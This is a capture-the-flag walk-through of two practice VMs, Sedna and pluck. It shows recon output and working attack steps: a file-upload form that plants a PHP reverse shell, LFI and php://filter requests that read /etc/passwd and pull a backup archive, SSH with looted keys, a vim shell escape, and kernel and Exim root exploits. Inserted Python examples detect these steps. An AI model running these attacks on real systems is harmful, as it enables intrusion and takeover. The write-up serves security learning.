hackfest2016: Sedna Walk-through

Hi There,

In this post I will walk through the hackfest2016: Sedna VM, so let's start!

Enumeration:

We will scan all TCP ports along with the top UDP ports, and then probe SNMP (161/udp) and TFTP (69/udp) separately:

root@kali:~/vulnhub/sedna# nmap -sS -p- -A --reason 192.168.17.156  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.156 \
> && nmap -sU -p 161 192.168.17.156 \
> && nmap -sU -p 69 192.168.17.156

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:35 +03
Nmap scan report for 192.168.17.156
Host is up, received arp-response (0.0011s latency).
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: more IDLE LOGIN-REFERRALS post-login STARTTLS Pre-login LITERAL+ IMAP4rev1 LOGINDISABLEDA0001 capabilities listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE LOGIN-REFERRALS post-login more AUTH=PLAINA0001 LITERAL+ IMAP4rev1 capabilities Pre-login listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp   open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
32833/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -32s, deviation: 0s, median: -32s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-04-27T10:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.96 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:38 +03
Nmap scan report for 192.168.17.156
Host is up (0.00091s latency).
Not shown: 49 closed ports, 47 open|filtered ports
PORT     STATE SERVICE    VERSION
53/udp   open  domain     ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
111/udp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
137/udp  open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
5353/udp open  mdns       DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.17.156 fe80:0:0:0:20c:29ff:fee7:55b6
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: SEDNA

Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.13 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.00092s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.0012s latency).
PORT   STATE  SERVICE
69/udp closed tftp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

There are two web applications, on ports 80 and 8080. I tried to attack the Tomcat server on port 8080 by abusing the PUT HTTP method, but it turned out that the Nmap result was a false positive. I also could not log in to the Tomcat manager panel with default credentials or common passwords.

Now let's look at the web application on port 80. There is nothing interesting there, just an HTML page with a photo of a planet, so I will brute-force directories.

gobuster -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e -u http://192.168.17.156

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.17.156/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Expanded     : true
=====================================================
http://192.168.17.156/.htaccess (Status: 403)
http://192.168.17.156/.hta (Status: 403)
http://192.168.17.156/.htpasswd (Status: 403)
http://192.168.17.156/blocks (Status: 301)
http://192.168.17.156/files (Status: 301)
http://192.168.17.156/index.html (Status: 200)
http://192.168.17.156/modules (Status: 301)
http://192.168.17.156/robots.txt (Status: 200)
http://192.168.17.156/server-status (Status: 403)
http://192.168.17.156/system (Status: 301)
http://192.168.17.156/themes (Status: 301)
=====================================================

The themes directory seems interesting.

After browsing the directories, we can tell that the application is BuilderEngine.

So I searched exploit-db.com for a published exploit and found this one:

Exploitation:

Basically, this exploit makes a POST request to the web application's file-upload endpoint and uploads an arbitrary file, because the handler does not restrict the file type. I edited the exploit to point at the VM's IP address, then tried to upload the well-known php-reverse-shell after editing my listening IP and port.

root@kali:~/vulnhub/sedna# cat > upload.html
<html>
<body>
<form method="post" action="http://192.168.17.156/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
^C

Then we get the following response from the application:

Now all we have to do is request the uploaded file from the files directory, as mentioned in the exploit, with an nc listener running to catch the reverse shell.

http://192.168.17.156/files/php-reverse-shell.php

After looking around a bit, we get the first flag:

Privilege Escalation:

I always try kernel exploits first, but this time I could not get a root shell after trying many of them. I then tried the dirtyc0w kernel exploit, since the victim system fit its requirements, and luckily it worked.

pluck: 1 walk-through

In this post we will walk through the pluck: 1 VM, so let's start!

Enumeration:

We will scan all TCP ports along with the top UDP ports, and then probe SNMP (161/udp) and TFTP (69/udp) separately:

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
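Both scans above (Sedna and pluck) are read by eye; as an added example that is not part of the original post, here is a small Python parser for nmap's normal-output format that pulls the open ports out of the port table, attaches the NSE script lines printed beneath each port, and flags the findings a defender would triage first. It assumes the excerpt below, which is constructed from lines of the two scans, and the risk labels are this example's own wording.

```python
import re
# Constructed excerpt: lines copied from the Sedna and pluck nmap scans above, trimmed.
SAMPLE_NMAP = """\
PORT      STATE SERVICE     REASON         VERSION
53/udp    open  domain      ISC BIND 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
3306/tcp  open  mysql       syn-ack ttl 64 MySQL (unauthorized)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""
# Port-table row, with or without the --reason column ("syn-ack ttl 64").
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>open\|filtered|open|closed|filtered)\s+"
    r"(?P<service>\S+)\s*(?:[a-z-]+ ttl \d+\s*)?(?P<version>.*)$")
# NSE output worth a second look; the labels are this example's own wording.
RISK_RULES = [(re.compile(p), label) for p, label in [
    ("Potentially risky methods", "risky HTTP methods"),
    ("message_signing: disabled", "SMB signing disabled"),
    ("Recursion appears to be enabled", "open DNS recursion")]]
RISKY_SERVICES = {"mysql": "database service reachable"}

def parse_nmap(text):
    # Returns (open port -> {service, version, scripts}, host-level script lines).
    ports, host_scripts, current = {}, [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:  # new port row; script lines that follow belong to it if it is open
            current = f"{m['port']}/{m['proto']}" if m["state"] == "open" else None
            if current:
                ports[current] = {"service": m["service"], "version": m["version"].strip(), "scripts": []}
        elif line.startswith("Host script results"):
            current = "host"
        elif line.startswith("|") and current:  # "| " and "|_  " NSE continuation lines
            body = line.lstrip("|_ ").strip()
            (host_scripts if current == "host" else ports[current]["scripts"]).append(body)
    return ports, host_scripts

def triage(text):
    # List (port or "host", label) for each finding a defender should review first.
    ports, host_scripts = parse_nmap(text)
    findings = []
    for key, info in ports.items():
        if info["service"] in RISKY_SERVICES:
            findings.append((key, RISKY_SERVICES[info["service"]]))
        findings += [(key, lbl) for b in info["scripts"] for rx, lbl in RISK_RULES if rx.search(b)]
    findings += [("host", lbl) for b in host_scripts for rx, lbl in RISK_RULES if rx.search(b)]
    return findings
```

Feed it the saved normal output (`nmap -oN`) of a real scan; the same rules will pick out the PUT/DELETE, SMB-signing and DNS-recursion lines from the Sedna scan above.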

The website on port 80 is powered by PHP. I tried many PHP tricks to check for vulnerabilities and discovered that the site is vulnerable to local file inclusion (LFI) and to the php://filter base64-encode trick!

http://192.168.17.153/index.php?page=/etc/passwd

Now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user

Exploitation

I tried brute-forcing and SQL injection against the admin login page, but no luck.

Next I went back to the user list and tried to include the backup script that is set as the login shell of backup-user:

http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh

We could include the tar file directly, but the raw binary inside the HTML page would be a total mess! Instead, let's use the php://filter base64-encode trick to download the file safely: the wrapper base64-encodes the contents of backup.tar, we cut away the HTML around it, and decode it locally.

curl 'http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar' | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup
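The two request patterns this post and the Sedna post above rely on (a POST to the jquery-file-upload handler followed by a fetch of a .php file under /files/, and an index.php?page= value that is an absolute path, a ../ sequence or a php:// wrapper) are easy to spot in Apache's access log. As an added example, not code from either post, here is a Python triage script that classifies constructed combined-log lines and correlates upload-then-execute by client IP; the log lines, IPs and labels are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not taken from either VM); the request paths mirror
# the upload endpoint, the dropped shell and the LFI / php://filter requests described above.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2017:17:50:01 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Apr/2017:17:51:10 +0300] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 233 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Apr/2017:17:51:15 +0300] "GET /files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Apr/2017:11:40:02 +0300] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1874 "-" "curl/7.52.1"
10.0.0.9 - - [24/Apr/2017:11:41:30 +0300] "GET /index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar HTTP/1.1" 200 90412 "-" "curl/7.52.1"
10.0.0.9 - - [24/Apr/2017:11:42:00 +0300] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1874 "-" "curl/7.52.1"
10.0.0.9 - - [24/Apr/2017:11:43:00 +0300] "GET /index.php?page=about HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/jquery-file-upload/server/php/"   # the handler abused in the Sedna post
SCRIPT_EXT = re.compile(r"\.ph(p\d?|tml|ar)$", re.IGNORECASE)  # server-side script extensions
PARAM_VALUE = re.compile(r"(?:^|&)[^=&]+=(?P<v>[^&]*)")   # every value in the query string

def classify(line):
    """Return a finding label for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = unquote(m["url"]).partition("?")  # decode %2F-style encoding first
    if m["method"] == "POST" and UPLOAD_ENDPOINT in path and m["status"].startswith("2"):
        return "upload-endpoint-post"
    if path.startswith("/files/") and SCRIPT_EXT.search(path):
        return "script-in-upload-dir"
    for v in PARAM_VALUE.findall(query):
        if re.match(r"[a-z]+://", v, re.IGNORECASE):   # php://, file://, http:// ...
            return "stream-wrapper-in-param"
        if v.startswith("/") or "../" in v:
            return "path-traversal-in-param"
    return None

def triage(log_text):
    """(ip, label, url) for every suspicious line, plus IPs that uploaded and then fetched a script."""
    hits = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            hits.append((m["ip"], label, m["url"]))
    uploaded = {ip for ip, lbl, _ in hits if lbl == "upload-endpoint-post"}
    executed = {ip for ip, lbl, _ in hits if lbl == "script-in-upload-dir"}
    return hits, sorted(uploaded & executed)
```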

After extracting the archive we notice a keys folder containing SSH keys for the user paul. We try the keys one by one until we get a valid SSH login:

ssh paul@192.168.17.153 -i id_key4

We are presented with a menu-style login shell, in this case Pdmenu. However, we can escape this menu by selecting Edit file and typing any file name, which opens vim. From vim, set the shell:

:set shell=/bin/bash

Then type the following to drop into Bash:

:shell

Privilege Escalation

I tried to escalate using kernel exploits, but no luck. However, after searching for SUID binaries we notice the Exim mail agent:

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
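What stands out in the listing above is not its length but the one entry that does not come from a distro package, so as an added example (not from the original post) here is a Python check that diffs a SUID listing against a recorded baseline and flags paths outside packaged directories or with a version-stamped file name. The baseline and the trimmed find output below are constructed for the example.

```python
import re
import posixpath

# Constructed reference snapshot: in practice you record it from a freshly built host of the
# same image. Here it is a subset of the post's listing minus the entry the check should catch,
# plus /bin/umount so the "missing from host" direction is exercised too.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/bin/su", "/bin/mount", "/bin/ping", "/bin/umount",
}
# Directories a distro package manager installs into; SUID files elsewhere deserve a look.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
VERSION_STAMP = re.compile(r"-\d+(\.\d+)+")   # e.g. exim-4.84-7: hand-built, not packaged

# Constructed input: a subset of the `find / -perm -u=s -type f` output shown in the post.
FIND_OUTPUT = """\
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/bin/su
/bin/mount
/bin/ping
"""

def audit_suid(find_output, baseline=BASELINE):
    """Map each path to the reasons it stands out; also report baseline entries now missing."""
    current = {p.strip() for p in find_output.splitlines() if p.strip()}
    findings = {}
    for path in sorted(current):
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(PACKAGED_PREFIXES):
            reasons.append("outside packaged prefixes")
        if VERSION_STAMP.search(posixpath.basename(path)):
            reasons.append("version-stamped name")
        if reasons:
            findings[path] = reasons
    for path in sorted(baseline - current):   # a SUID bit that disappeared is drift as well
        findings[path] = ["in baseline, missing from host"]
    return findings
```

On a real host, pipe the find output from the post straight into `audit_suid`; the exim binary is the only entry that trips all three checks at once.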

I tried some exploits to escalate privileges through the Exim binary, but they did not work for me. However, I decided to give this exploit a shot, since the version difference is minimal, and luckily it works.

Flag:


And that's it.